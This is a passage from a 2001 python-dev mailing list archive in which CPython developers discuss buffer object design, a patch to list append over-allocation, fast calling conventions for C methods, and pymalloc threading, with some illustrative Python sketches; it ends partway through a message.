In-Reply-To: <3B0E166E.581816AA@lemburg.com>; from mal@lemburg.com on Fri, May 25, 2001 at 10:23:10AM +0200
References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> <3B0E166E.581816AA@lemburg.com>
Message-ID: <20010525045923.C12056@lyra.org>

On Fri, May 25, 2001 at 10:23:10AM +0200, M.-A. Lemburg wrote:
> Greg Ewing wrote:
> > "M.-A. Lemburg" <mal at lemburg.com>:
> > 
> > > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > > Then you could write: buffer(ob).find('.').
> > 
> > Aren't buffer objects as they're currently implemented
> > inherently dangerous?
> 
> Why should they be ?

The buffer object caches the pointer from getreadbuffer and friends. If the
target object changes that pointer (internally), then the buffer object's
value is stale.

But that is a bug fix; it is independent of the discussion at hand.
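
The caching problem can be modelled in a few lines of Python. The classes below are hypothetical: `Exporter` stands in for an object such as an array whose storage is reallocated when it grows, and `get_storage()` plays the role of getreadbuffer(). Python never frees the old block, so the model shows stale data; in C, a cached pointer into a block that realloc() has freed can be worse than stale.

```python
class Exporter:
    """Hypothetical exporter whose storage is replaced when it grows."""

    def __init__(self, data):
        self._storage = bytearray(data)

    def get_storage(self):
        # Plays the role of getreadbuffer(): returns the current block.
        return self._storage

    def grow(self, extra):
        # Models realloc() moving the data: a new block replaces the old one.
        self._storage = self._storage + bytearray(extra)


class CachingBuffer:
    """Asks the exporter once and keeps the answer (the reported bug)."""

    def __init__(self, target):
        self._block = target.get_storage()

    def value(self):
        return bytes(self._block)


class RefetchingBuffer:
    """Asks the exporter again on every access (the fix)."""

    def __init__(self, target):
        self._target = target

    def value(self):
        return bytes(self._target.get_storage())
```

The fix is local to the buffer object: re-fetch the pointer from the target on each access instead of storing it once at construction time.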

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From Barrett at stsci.edu  Fri May 25 15:21:20 2001
From: Barrett at stsci.edu (Paul Barrett)
Date: Fri, 25 May 2001 09:21:20 -0400
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com>
Message-ID: <3B0E5C50.6E365F69@STScI.Edu>

"M.-A. Lemburg" wrote:
> 
> > > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > > Then you could write: buffer(ob).find('.').
> >
> > You're totally missing the point with that suggestion. It does *not*
> > suffice to add them to buffer objects. What about array objects? mmap
> > objects?  Random Joe Object who implements the buffer interface?
> 
> That's the point: you can wrap all those into a buffer object
> and then use the buffer object methods to manipulate them. In
> that sense, buffer objects provide an adaptor to the underlying
> object which implements the needed methods.

Sounds like you are trying to make the buffer object into something it
is not. Not that I have the foggiest idea what it is now, since it
hasn't much use and is badly broken.

I like your idea of sharing functions, I just don't think the buffer
object is the proper means.  I think the buffer object should be
removed from Python and something better put in its place. (I'm not
talking about the buffer C/API, though this could also use an
overhaul, since it doesn't provide enough information to the receiving
method.)

What I think we need is:

1) a malloc object which has a similar interface to the mmap object
with access protection, etc.  This object would be the fundamental way
of getting memory.  The string object would use it to allocate a chunk
of 'read-only' memory.  Other objects would then know not to modify
the contents of the memory.  If you wanted a reference or view of the
memory/buffer, you would get a reference to this object.

2) objects supporting the buffer object should provide a view method
which returns a copy of themselves (and hence all their methods) and
can be used to get a pointer to a subset of its memory.  In this way
the type of memory/buffer being accessed is known compared to the
current buffer object which only indicates the buffer is binary or
char data.  In essence information about how the buffer should be used
is lost in the current buffer C/API.

-- 
Paul Barrett, PhD      Space Telescope Science Institute
Phone: 410-338-4475    ESS/Science Software Group
FAX:   410-338-4767    Baltimore, MD 21218


From guido at digicool.com  Fri May 25 16:29:28 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 25 May 2001 10:29:28 -0400
Subject: [Python-Dev] Vacation
Message-ID: <200105251429.f4PETSd10633@odiug.digicool.com>

I will be on vacation next week without net access.  Back on June 4th!

There's a bunch of stuff that happened on the mailing list that I
expect I won't get to -- I've got to finish up some high priority
work for Digital Creations before I can leave.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Fri May 25 21:06:16 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 25 May 2001 15:06:16 -0400
Subject: [Python-Dev] Time for the yearly list.append() panic
Message-ID: <LNBBLJKPBEHFEDALKOLCIEIEKEAA.tim.one@home.com>

c.l.py has rediscovered the quadratic-time worst-case behavior of
list.append().  That is, do list.append(x) in a long loop.  Linux users
don't see anything particularly bad no matter how big the loop.  WinNT
eventually displays clear quadratic-time behavior.  Win9x dies
surprisingly early with a MemoryError, despite gobs of memory free:
turns out Win9x allocates hundreds of virtual heaps, isn't able to
coalesce them, and you actually run out of *address space* (the whole
2GB user space gets fragmented beyond hope).  People on other platforms
have reported other bad behaviors over the years.

I don't want to argue about this again <wink>, I just want to know
whether the patch below slows anything down on your oddball box.  It
increases the over-allocation amount in several more layers.  It also
replaces integer * and / in the over-allocation computation with bit
operations (integer / in particular is very slow on *some* boxes).

Long-term we should teach PyMalloc about Python's realloc() abuses and
craft a cooperative solution.

Index: Objects/listobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/listobject.c,v
retrieving revision 2.92
diff -c -r2.92 listobject.c
*** Objects/listobject.c	2001/02/12 22:06:02	2.92
--- Objects/listobject.c	2001/05/25 19:04:07
***************
*** 9,24 ****
  #include <sys/types.h>		/* For size_t */
  #endif

! #define ROUNDUP(n, PyTryBlock) \
! 	((((n)+(PyTryBlock)-1)/(PyTryBlock))*(PyTryBlock))

  static int
  roundupsize(int n)
  {
! 	if (n < 500)
  		return ROUNDUP(n, 10);
  	else
! 		return ROUNDUP(n, 100);
  }

  #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems))
--- 9,30 ----
  #include <sys/types.h>		/* For size_t */
  #endif

! #define ROUNDUP(n, nbits) \
! 	( ((n) + (1<<(nbits)) - 1) >> (nbits) << (nbits) )

  static int
  roundupsize(int n)
  {
! 	if ((n >> 9) == 0)
! 		return ROUNDUP(n, 3);
! 	else if ((n >> 13) == 0)
! 		return ROUNDUP(n, 7);
! 	else if ((n >> 17) == 0)
  		return ROUNDUP(n, 10);
+ 	else if ((n >> 20) == 0)
+ 		return ROUNDUP(n, 13);
  	else
! 		return ROUNDUP(n, 18);
  }

  #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems))
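
To see what the patch changes, here is a Python transcription of the old and new roundupsize() from the diff, plus a helper that counts how many distinct allocation sizes a run of appends passes through. Counting distinct sizes is only a rough proxy, assumed here, for how often realloc() actually has to grow or move the block; the helper names are hypothetical.

```python
def roundupsize_old(n):
    # Pre-patch: round up to a multiple of 10 below 500, else of 100.
    block = 10 if n < 500 else 100
    return (n + block - 1) // block * block


def _roundup(n, nbits):
    # Round n up to a multiple of 2**nbits, like the new ROUNDUP macro.
    return ((n + (1 << nbits) - 1) >> nbits) << nbits


def roundupsize_new(n):
    # Post-patch: the rounding granularity grows with the list size.
    if (n >> 9) == 0:
        return _roundup(n, 3)
    elif (n >> 13) == 0:
        return _roundup(n, 7)
    elif (n >> 17) == 0:
        return _roundup(n, 10)
    elif (n >> 20) == 0:
        return _roundup(n, 13)
    else:
        return _roundup(n, 18)


def distinct_sizes(roundup, nappends):
    # Each append resizes to roundup(new_length); count distinct sizes.
    return len({roundup(k) for k in range(1, nappends + 1)})
```

For a million appends the old policy steps through about ten thousand distinct sizes, the new one only a few hundred, while the bit shifts avoid the integer division Tim mentions.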


From martin at loewis.home.cs.tu-berlin.de  Fri May 25 21:51:26 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 25 May 2001 21:51:26 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B0E1E2C.4BC121B5@lemburg.com> (mal@lemburg.com)
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com>
Message-ID: <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>

> Now this would be more flexible if you would implement a scheme
> which lets us put the parser string into the method list. The
> call mechanism could then easily figure out how to call the
> method and it would also be more easily extensible:
> 
>  {"append", (PyCFunction)listappend,  METH_DIRECT, append_doc, "O"},

I'd like to hear other people's comment on this specific issue, so I
guess I should probably write a PEP outlining the options.

My immediate reaction to your proposal is that it only complicates the
interface without any savings. We still can only support a limited
number of calling conventions. E.g. it is not possible to write
portable C code that does all the calling conventions for "l", "ll",
"lll", "llll", and so on - you have to cast the function pointer to
the right prototype, which must be done in source code.

So with this interface, you may end up at run-time finding out that
you cannot support the signature. With the current patch, you'd have
to know to convert "OO" into METH_OO, which I think is not asked too
much - and it gives you a compile-time error if you use an unsupported
calling convention.

> A parser marker "OO" would then call a method like this:
> 
>  method(self, arg0, arg1)
> 
> and so on.

That is indeed the plan, but since you have to code the parameter
combinations in C code, you can only support so many of them.

> allows implementing a generic scheme which
> then again relies on PyArg_ParseTuple() to do the argument
> parsing, e.g. "is#" could be implemented as:

The point of the patch is to get rid of PyArg_ParseTuple in the
"common case". For functions with complex calling conventions, getting
rid of the PyArg_ParseTuple string parsing is not that important,
since they are expensive, anyway (not that "is#" couldn't be
supported, I'd call it METH_is_hash).

> For optional arguments we'd need some convention which then
> lets the called function add the default value as needed.

For the moment, I'd only support "|O", and perhaps "|z"; an omitted
argument would be represented as a NULL pointer. That means that "|i"
couldn't participate in the fast calling convention - unless we
translate that to

void foo(PyObject*self, int i, bool ipresent);

BTW, the most frequent function in my measurements that would make use
of this convention is "OO|i:replace", which scores at 4.5%.

Regards,
Martin


From gstein at lyra.org  Fri May 25 22:27:52 2001
From: gstein at lyra.org (Greg Stein)
Date: Fri, 25 May 2001 13:27:52 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0E5C50.6E365F69@STScI.Edu>; from Barrett@stsci.edu on Fri, May 25, 2001 at 09:21:20AM -0400
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu>
Message-ID: <20010525132752.B5402@lyra.org>

On Fri, May 25, 2001 at 09:21:20AM -0400, Paul Barrett wrote:
> "M.-A. Lemburg" wrote:
> > 
> > > > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > > > Then you could write: buffer(ob).find('.').
> > >
> > > You're totally missing the point with that suggestion. It does *not*
> > > suffice to add them to buffer objects. What about array objects? mmap
> > > objects?  Random Joe Object who implements the buffer interface?
> > 
> > That's the point: you can wrap all those into a buffer object
> > and then use the buffer object methods to manipulate them. In
> > that sense, buffer objects provide an adaptor to the underlying
> > object which implements the needed methods.
> 
> Sounds like you are trying to make the buffer object into something it
> is not.

The buffer object is intended to provide a Python-level object (with methods
and behavior) for any other object which exports the buffer API (but not
those particular methods/behavior).

It was added for Python 1.5.2, but did not keep up with the methods added to
the string object. Arguably, it is out of date rather than "[turning it
into] something it is not."

> Not that I have the foggiest idea what it is now, since it
> hasn't much use and is badly broken.

"badly" is overstating the problem. It caches a pointer when it shouldn't.
This doesn't work well when using it with array objects or PIL's image
objects. For most objects, it is fine.

The buffer object is also very good for C/Python extensions and embedding
code. It provides a Python-level view on a block of memory. Using a string
object implies making a copy, and it removes the possibility for read/write
access to that memory.

And you state: "Not that I have the foggiest idea what it is now". If so,
then wtf are you making statements about the buffer object's behavior?

> I like your idea of sharing functions, I just don't think the buffer
> object is the proper means.  I think the buffer object should be
> removed from Python and something better put in its place. (I'm not
> talking about the buffer C/API, though this could also use an
> overhaul, since it doesn't provide enough information to the receiving
> method.)
> 
> What I think we need is:
> 
> 1) a malloc object which has a similar interface to the mmap object
> with access protection, etc.  This object would be the fundamental way
> of getting memory.  The string object would use it to allocate a chunk
> of 'read-only' memory.  Other objects would then know not to modify
> the contents of the memory.  If you wanted a reference or view of the
> memory/buffer, you would get a reference to this object.

You're talking about the buffer object that we have *today*.

It can refer to another object (i.e. the memory exposed via the other
object's buffer API), refer to memory, or it can allocate its own memory.
The buffer object can be marked read-only, or read-write.

> 2) objects supporting the buffer object should provide a view method
> which returns a copy of themselves (and hence all their methods) and
> can be used to get a pointer to a subset of its memory.  In this way
> the type of memory/buffer being accessed is known compared to the
> current buffer object which only indicates the buffer is binary or
> char data.  In essence information about how the buffer should be used
> is lost in the current buffer C/API.

I'm not sure that I understand this paragraph.


No... what needs to happen is to have the bug in PyBufferObject fixed. Then
to refactor stringobject.c and stropmodule.c to move all of those
byte-oriented processing functions into a new file such as Python/byteops.c
(whatever; name isn't important). Ideally, stringobject.c and stropmodule.c
would be simple covers over the same functions.

Those functions can then be used by PyBufferObject to implement the rest of
the string methods on itself.


This would leave us at MAL's suggested point: via the buffer object, we can
perform all of the standard string methods/ops on any object that implements
the buffer API.
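
As a rough illustration of a byte-oriented function that needs only the data and its length, here is a sketch in Python 3, where memoryview plays the role of the buffer API. `byte_find` is a hypothetical name and the naive search is for clarity, not speed; the point is that the same function serves bytes, bytearray and array objects without knowing their layout.

```python
from array import array


def byte_find(obj, sub, start=0):
    """Hypothetical shared helper: naive substring search over any object
    exporting the buffer protocol, using only its raw bytes and length."""
    view = memoryview(obj).cast("B")  # flat view of the exported bytes
    needle = bytes(sub)
    n, m = len(view), len(needle)
    for i in range(start, n - m + 1):
        if view[i:i + m] == needle:
            return i
    return -1


print(byte_find(b"www.python.org", b"."))
print(byte_find(bytearray(b"a.b"), b"."))
print(byte_find(array("B", b"x.y"), b"."))
```

A string method and a buffer method could then both be thin covers over `byte_find`, which is the refactoring described above.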

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From mal at lemburg.com  Fri May 25 23:16:32 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 23:16:32 +0200
Subject: [Python-Dev] Time for the yearly list.append() panic
References: <LNBBLJKPBEHFEDALKOLCIEIEKEAA.tim.one@home.com>
Message-ID: <3B0ECBB0.6798F4AB@lemburg.com>

Tim Peters wrote:
> 
> Long-term we should teach PyMalloc about Python's realloc() abuses and craft a cooperative solution.

That's what I think too. There's really not much point in trying
to work around poor malloc() implementations when we've already
got the cure built into Python... I just wish Vladimir would 
resurface again to complete his great work (AFAIK, pymalloc still
has problems with threads).

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Fri May 25 23:38:15 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 23:38:15 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>
Message-ID: <3B0ED0C7.F1A665EA@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > Now this would be more flexible if you would implement a scheme
> > which lets us put the parser string into the method list. The
> > call mechanism could then easily figure out how to call the
> > method and it would also be more easily extensible:
> >
> >  {"append", (PyCFunction)listappend,  METH_DIRECT, append_doc, "O"},
> 
> I'd like to hear other people's comment on this specific issue, so I
> guess I should probably write a PEP outlining the options.
> 
> My immediate reaction to your proposal is that it only complicates the
> interface without any savings. We still can only support a limited
> number of calling conventions. E.g. it is not possible to write
> portable C code that does all the calling conventions for "l", "ll",
> "lll", "llll", and so on - you have to cast the function pointer to
> the right prototype, which must be done in source code.
>
> So with this interface, you may end up at run-time finding out that
> you cannot support the signature. With the current patch, you'd have
> to know to convert "OO" into METH_OO, which I think is not asked too
> much - and it gives you a compile-time error if you use an unsupported
> calling convention.

True. It's unfortunate that C doesn't offer the reverse of
varargs.h...
 
> > A parser marker "OO" would then call a method like this:
> >
> >  method(self, arg0, arg1)
> >
> > and so on.
> 
> That is indeed the plan, but since you have to code the parameter
> combinations in C code, you can only support so many of them.
> 
> > allows implementing a generic scheme which
> > then again relies on PyArg_ParseTuple() to do the argument
> > parsing, e.g. "is#" could be implemented as:
> 
> The point of the patch is to get rid of PyArg_ParseTuple in the
> "common case". For functions with complex calling conventions, getting
> rid of the PyArg_ParseTuple string parsing is not that important,
> since they are expensive, anyway (not that "is#" couldn't be
> supported, I'd call it METH_is_hash).
> 
> > For optional arguments we'd need some convention which then
> > lets the called function add the default value as needed.
> 
> For the moment, I'd only support "|O", and perhaps "|z"; an omitted
> argument would be represented as a NULL pointer. That means that "|i"
> couldn't participate in the fast calling convention - unless we
> translate that to
> 
> void foo(PyObject*self, int i, bool ipresent);
> 
> BTW, the most frequent function in my measurements that would make use
> of this convention is "OO|i:replace", which scores at 4.5%.

I was thinking of using pointer indirection for this:

	foo(PyObject *self, int *i)

If i is given as argument, *i is set to the value, otherwise
i is set to NULL.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one at home.com  Sat May 26 00:11:43 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 25 May 2001 18:11:43 -0400
Subject: [Python-Dev] Time for the yearly list.append() panic
In-Reply-To: <3B0ECBB0.6798F4AB@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEIMKEAA.tim.one@home.com>

[Tim]
> Long-term we should teach PyMalloc about Python's realloc()
> abuses and craft a cooperative solution.

[MAL]
> That's what I think too. There's really not much point in trying
> to work around poor malloc() implementations when we've already
> got the cure built into Python...

The point *here* is that a simple localized patch could kill off a
Frequently Irritating Complaint without further ado:  on my personal
cost/benefit scale, it's all I can *afford* to do now.  PyMalloc likely
won't solve it as-is x-platform, without new work to accommodate extreme
realloc() abuse.

> I just wish Vladimir would resurface again to complete his great
> work

I'd like him to come back even if he doesn't <wink>.

> (AFAIK, pymalloc still has problems with threads).

It has lock macros that haven't been #define'd to do anything yet.  But part
of the potential value of the Python core using its own allocator is to
exploit the global interpreter lock to *not* lock in the allocator.  Messy
issues.  Python should grow a cheaper platform-specific flavor of internal
lock too.  (Jeremy pointed out some code the other day that jumps through
hoops to simulate a reentrant lock on top of a Python lock; an irony is that
on Windows, the native lock *is* reentrant already, and Python jumps through
hoops to make it act as if it weren't <wink>)
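
The message does not show the code Jeremy found, so the following is only a generic sketch of the owner-plus-count technique for layering a reentrant lock over a non-reentrant one, written against Python 3's `threading.Lock`. The class name `ReentrantLock` is hypothetical; the standard library already provides `threading.RLock`.

```python
import threading


class ReentrantLock:
    """Hypothetical reentrant lock built on a plain, non-reentrant lock."""

    def __init__(self):
        self._lock = threading.Lock()  # underlying non-reentrant lock
        self._owner = None             # thread id of the current holder
        self._count = 0                # nesting depth of the holder

    def acquire(self):
        me = threading.get_ident()
        # Only this thread can ever store its own id in _owner, so
        # reading it without holding the lock is safe for this test.
        if self._owner == me:
            self._count += 1
            return
        self._lock.acquire()
        self._owner = me
        self._count = 1

    def release(self):
        if self._owner != threading.get_ident():
            raise RuntimeError("release of un-acquired lock")
        self._count -= 1
        if self._count == 0:
            self._owner = None
            self._lock.release()
```

These are exactly the hoops a native reentrant lock would make unnecessary: an extra owner check and counter on every acquire and release.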


From mal at lemburg.com  Sat May 26 00:07:00 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sat, 26 May 2001 00:07:00 +0200
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu> <20010525132752.B5402@lyra.org>
Message-ID: <3B0ED784.FC53D01@lemburg.com>

Greg Stein wrote:
> 
> No... what needs to happen is to have the bug in PyBufferObject fixed. Then
> to refactor stringobject.c and stropmodule.c to move all of those
> byte-oriented processing functions into a new file such as Python/byteops.c
> (whatever; name isn't important). Ideally, stringobject.c and stropmodule.c
> would be simple covers over the same functions.
> 
> Those functions can then be used by PyBufferObject to implement the rest of
> the string methods on itself.
> 
> This would leave us at MAL's suggested point: via the buffer object, we can
> perform all of the standard string methods/ops on any object that implements
> the buffer API.

I wonder how we could achieve this without copy&pasting all
the needed methods from stringobject.c to bufferobject.c....
all the string methods use the string object layout directly
rather than just dealing with a pointer and a length.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From m.favas at per.dem.csiro.au  Sat May 26 04:34:20 2001
From: m.favas at per.dem.csiro.au (Mark Favas)
Date: Sat, 26 May 2001 10:34:20 +0800
Subject: [Python-Dev] Time for the yearly list.append() panic
Message-ID: <3B0F162C.AD16E452@per.dem.csiro.au>

[Tim wants to know whether his patch to listobject.c slows anything down
on anyone's "oddball box"...]

While in no way admitting that mine is an oddball box <wink>, it being a
Tru64 Unix alpha processor machine, I do see a slowdown after applying
the patch (measured on the test suite and on pystone). However, it's
only of the order of 0.5 to 1%.

slightly-oddly y'rs  - Mark

-- 
Mark Favas  -   m.favas at per.dem.csiro.au
CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA


From tim.one at home.com  Sat May 26 06:05:40 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 26 May 2001 00:05:40 -0400
Subject: [Python-Dev] Time for the yearly list.append() panic
In-Reply-To: <3B0F162C.AD16E452@per.dem.csiro.au>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEJAKEAA.tim.one@home.com>

[Mark Favas]
> [Tim wants to know whether his patch to listobject.c slows anything down
> on anyone's "oddball box"...]
>
> While in no way admitting that mine is an oddball box <wink>,

Heh -- of course not.  I had more in mind obscure OSes like Linux <wink>.

> it being a Tru64 Unix alpha processor machine, I do see a slowdown
> after applying the patch (measured on the test suite and on pystone).
> However, it's only of the order of 0.5 to 1%.

Now that's very odd, since Alpha has about the slowest integer division on
Earth, and every list append was doing an int div before the patch but not
after.
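To make the division point concrete, here is the general shape of the trade-off as a Python sketch. Rounding a size up to a multiple of some block costs an integer division in general. When the block is a power of two, the same result comes from an add and a mask. These helpers are hypothetical illustrations and are not the code in Tim's listobject.c patch.

```python
def roundup_div(n, block):
    """Round n up to a multiple of block using integer division."""
    return ((n + block - 1) // block) * block


def roundup_mask(n, block):
    """Same result without division; block must be a power of two."""
    if block <= 0 or block & (block - 1):
        raise ValueError("block must be a power of two")
    return (n + block - 1) & ~(block - 1)


for n in (0, 1, 7, 8, 9, 100):
    print(n, roundup_div(n, 8), roundup_mask(n, 8))
```

In C the masked form is an add and an AND, which is the kind of saving that would show up on a CPU with slow division.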

I'm afraid that timing the test suite before and after is a red herring, as
several of the expensive tests have (pseudo)random components and can do an
amount of work that varies depending on system time at the time random.py is
first imported.

pystone is even odder:  the relevant code in listobject.c is never executed
during pystone!  I suspected that because pystone is an old synthetic Ada
benchmark simulating a pile of integer systems programs, so pystone is
unique among Python programs in not exercising any of Python's useful
features <wink> -- a breakpoint in the debugger just now confirmed it (never
did a list resize after compilation finished).

So I'm pretty sure that after I check it in, you'll see a speedup instead
<wink>.

Get anywhere identifying why your other app is 20% slower (blast from the
past)?


From martin at loewis.home.cs.tu-berlin.de  Sat May 26 07:28:32 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sat, 26 May 2001 07:28:32 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B0ED0C7.F1A665EA@lemburg.com> (mal@lemburg.com)
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com>
Message-ID: <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>

> I was thinking of using pointer indirection for this:
> 
> 	foo(PyObject *self, int *i)
> 
> If i is given as argument, *i is set to the value, otherwise
> i is set to NULL.

That is a good idea; I'll try to update my patch to cover more calling
conventions.

Regards,
Martin


From tim.one at home.com  Sat May 26 08:44:04 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 26 May 2001 02:44:04 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0ED784.FC53D01@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEJEKEAA.tim.one@home.com>

The buffer object has been neglected for years:  is that because it's in
prime shape, or because nobody cares about it enough to maintain it?  "The
bug" has been known for years without any action taken to address it; the
docs give up in spots and nobody addresses that either (like "The current
policy seems to state that these characters may be multi-byte characters" --
well, yes or no?); the builtin buffer() function isn't called anywhere in
the std test suite; the file object still has an undocumented readinto()
method that just confuses people who bump into it; and it's so obscure in
daily life that it appears Guido didn't even think of it when adding
iterators for the other sequence types.

I expect that answers my question <wink>.  Is someone (Greg? MAL?) going to
champion it now?  That would be cool.

About combining strop and buffers and strings, don't forget unicodeobject.c:
that's got oodles of basically duplicate code too.  /F suggested dealing
with the minor differences via maintaining one code file that gets compiled
multiple times w/ appropriate #defines.


From tim.one at home.com  Sat May 26 10:14:06 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 26 May 2001 04:14:06 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEJHKEAA.tim.one@home.com>

I don't want to see us duplicate the guts of PyArg_ParseTuple() inside
do_call_special().  METH_O is a cool idea, METH_l is marginal, and the new
code is already slower for METH_O than it needs to be in order to support
the *possibility* of METH_l too (stacks and loops and switch stmts and an
extra layer of do_call_special function call "just in case").

Do METH_O, convert every "O" function to use it, declare victory, and enjoy
the weekend <wink>.

1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
    size-ly y'rs  - tim


From m.favas at per.dem.csiro.au  Sat May 26 10:30:29 2001
From: m.favas at per.dem.csiro.au (Mark Favas)
Date: Sat, 26 May 2001 16:30:29 +0800
Subject: [Python-Dev] Time for the yearly list.append() panic
References: <LNBBLJKPBEHFEDALKOLCKEJAKEAA.tim.one@home.com>
Message-ID: <3B0F69A5.6F569573@per.dem.csiro.au>

[Tim tells Mark that his observations reflect more Brownian motion
(pseudo!) than reality...]

> [Mark Favas]
> > it being a Tru64 Unix alpha processor machine, I do see a slowdown
> > after applying the patch (measured on the test suite and on pystone).
> > However, it's only of the order of 0.5 to 1%.
> 
> Now that's very odd, since Alpha has about the slowest integer division on
> Earth, and every list append was doing an int div before the patch but not
> after.
> 
> I'm afraid that timing the test suite before and after is a red herring, as
> several of the expensive tests have (pseudo)random components and can do an
> amount of work that varies depending on system time at the time random.py is
> first imported.
> 
> pystone is even odder:  the relevant code in listobject.c is never executed
> during pystone!  I suspected that because pystone is an old synthetic Ada
> benchmark simulating a pile of integer systems programs, so pystone is
> unique among Python programs in not exercising any of Python's useful
> features <wink> -- a breakpoint in the debugger just now confirmed it (never
> did a list resize after compilation finished).
> 
> So I'm pretty sure that after I check it in, you'll see a speedup instead
> <wink>.

OK <grin>: this time, instead of making unwarranted assumptions about
test suites and pystones <wink>, I wrote and ran a test that I _think_
should exercise the code (at least, it does lots of list.append()s),
and, yes, the newly checked-in code's about 3-4% faster compared with
the original version of, well, days ago.
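Below is a microbenchmark in the spirit of Mark's test, sketched in Python 3 with the standard `timeit` module. It times nothing but a loop of `list.append()` calls and reports the best of several runs, which damps the run-to-run noise Tim describes. The function names and default sizes are arbitrary choices, not anything from the thread.

```python
import timeit


def build(n):
    """Append n ints to a fresh list, one append() at a time."""
    lst = []
    append = lst.append  # hoist the attribute lookup out of the loop
    for i in range(n):
        append(i)
    return lst


def best_append_time(n=100_000, repeat=5):
    """Seconds taken by the fastest of `repeat` runs of build(n)."""
    return min(timeit.repeat(lambda: build(n), number=1, repeat=repeat))


if __name__ == "__main__":
    print("best of 5: %.4f s" % best_append_time())
```

Run it once per build and compare the two numbers. `min()` is used because noise from the rest of the system only ever adds time.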

> 
> Get anywhere identifying why your other app is 20% slower (blast from the
> past)?

No, not yet. The profiling results at first eyeball seemed hard to match
up, so I put it off for a rainy weekend. And Perth's drought has just
broken... Will attempt to make sense of it. Interesting that Marc Andre
seemed to get a somewhat similar slowdown between 1.52 and 2.0.

-- 
Mark Favas  -   m.favas at per.dem.csiro.au
CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA


From mal at lemburg.com  Sat May 26 11:54:12 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sat, 26 May 2001 11:54:12 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>
Message-ID: <3B0F7D44.1A12CE0F@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > I was thinking of using pointer indirection for this:
> >
> >       foo(PyObject *self, int *i)
> >
> > If i is given as argument, *i is set to the value, otherwise
> > i is set to NULL.
> 
> That is a good idea; I'll try to update my patch to cover more calling
> conventions.

This morning another idea popped up which could help us with
handling generic calling schemes:

	How about making *all* parameters pointers ?!

The calling mechanism would then just have to deal with a
changing number of parameters and not with different types
(this is how PyArg_ParseTuple() works too if I remember correctly).

We could easily provide calling schemes for 1 - n arguments
that way and the types of these arguments would be defined
by the parser string just like before.

Examples:

